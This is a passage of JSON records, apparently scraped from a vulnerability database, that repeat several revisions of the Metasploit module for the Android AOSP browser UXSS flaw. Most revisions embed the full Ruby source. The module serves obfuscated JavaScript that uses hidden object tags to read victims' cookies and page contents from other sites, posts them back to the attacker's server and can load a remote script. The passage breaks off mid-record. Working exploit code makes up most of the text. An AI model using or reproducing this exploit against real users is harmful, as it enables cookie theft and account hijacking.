"2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-12T10:43:45", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}], "modified": "2019-02-12T10:43:45"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-12T10:43:45", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-16T10:55:23", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL", "SLACKWARE_SSA_2019-044-01.NASL", "SLACKWARE_SSA_2019-043-01.NASL", "DEBIAN_DLA-1672.NASL", "FEDORA_2019-333A7AA511.NASL", "FEDORA_2019-96AC060AF3.NASL", "ILO_HPESBHF_03769.NASL", "FEDORA_2019-8F2B27EFCE.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891672", "OPENVAS:1361412562310891673", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310891674", "OPENVAS:1361412562310704389", "OPENVAS:1361412562310891671", "OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND"]}, {"type": "threatpost", "idList": ["THREATPOST:CDABE9F22A062EE95B2025F63B6FB594"]}], "modified": "2019-02-16T10:55:23"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-16T10:55:23", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-16T12:55:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL", "SLACKWARE_SSA_2019-044-01.NASL", "SLACKWARE_SSA_2019-043-01.NASL", "DEBIAN_DLA-1672.NASL", "FEDORA_2019-333A7AA511.NASL", "FEDORA_2019-96AC060AF3.NASL", "ILO_HPESBHF_03769.NASL", "FEDORA_2019-8F2B27EFCE.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891672", "OPENVAS:1361412562310891673", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310891674", "OPENVAS:1361412562310704389", "OPENVAS:1361412562310891670", "OPENVAS:1361412562310891671", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND"]}, {"type": "threatpost", "idList": ["THREATPOST:CDABE9F22A062EE95B2025F63B6FB594"]}], "modified": "2019-02-16T12:55:42"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-16T12:55:42", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "7ada51750c1931e0ef44c393072b2a22", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-21T03:40:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1917035265467807555"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3077F0EE1977D22F0CA69194665A52BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891684", "OPENVAS:1361412562310891685", "OPENVAS:1361412562310891681", "OPENVAS:1361412562310704396", "OPENVAS:1361412562310891683", "OPENVAS:1361412562310891682", "OPENVAS:1361412562310704393", "OPENVAS:1361412562310891679", "OPENVAS:1361412562310891678", "OPENVAS:1361412562310704394"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4549"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}], "modified": "2019-02-21T03:40:42"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-21T03:40:42", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-21T05:40:31", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1917035265467807555"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3077F0EE1977D22F0CA69194665A52BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891684", "OPENVAS:1361412562310891685", "OPENVAS:1361412562310891681", "OPENVAS:1361412562310704396", "OPENVAS:1361412562310891682", "OPENVAS:1361412562310891683", "OPENVAS:1361412562310891679", "OPENVAS:1361412562310704393", "OPENVAS:1361412562310891678", "OPENVAS:1361412562310704394"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4549"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}], "modified": "2019-02-21T05:40:31"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-21T05:40:31", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "7ada51750c1931e0ef44c393072b2a22", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T07:57:37", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32462", "1337DAY-ID-32461", "1337DAY-ID-32459", "1337DAY-ID-32457", "1337DAY-ID-32460", "1337DAY-ID-32456", "1337DAY-ID-32463", "1337DAY-ID-32455", "1337DAY-ID-32453", "1337DAY-ID-32452"]}, {"type": "kitploit", "idList": ["KITPLOIT:358333751727618768", "KITPLOIT:6305301433518983839"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F"]}, {"type": "slackware", "idList": ["SSA-2019-086-01"]}], "modified": "2019-04-02T07:57:37"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-04-02T07:57:37", "differentElements": ["sourceData"], "edition": 68}], "viewCount": 71, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32462", "1337DAY-ID-32459", "1337DAY-ID-32461", "1337DAY-ID-32457", "1337DAY-ID-32460", "1337DAY-ID-32456", "1337DAY-ID-32463", "1337DAY-ID-32455", "1337DAY-ID-32453", "1337DAY-ID-32452"]}, {"type": "kitploit", "idList": ["KITPLOIT:358333751727618768", "KITPLOIT:6305301433518983839"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F"]}, {"type": "slackware", "idList": ["SSA-2019-086-01"]}], "modified": "2019-04-02T09:57:18"}, "vulnersScore": 4.3}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use 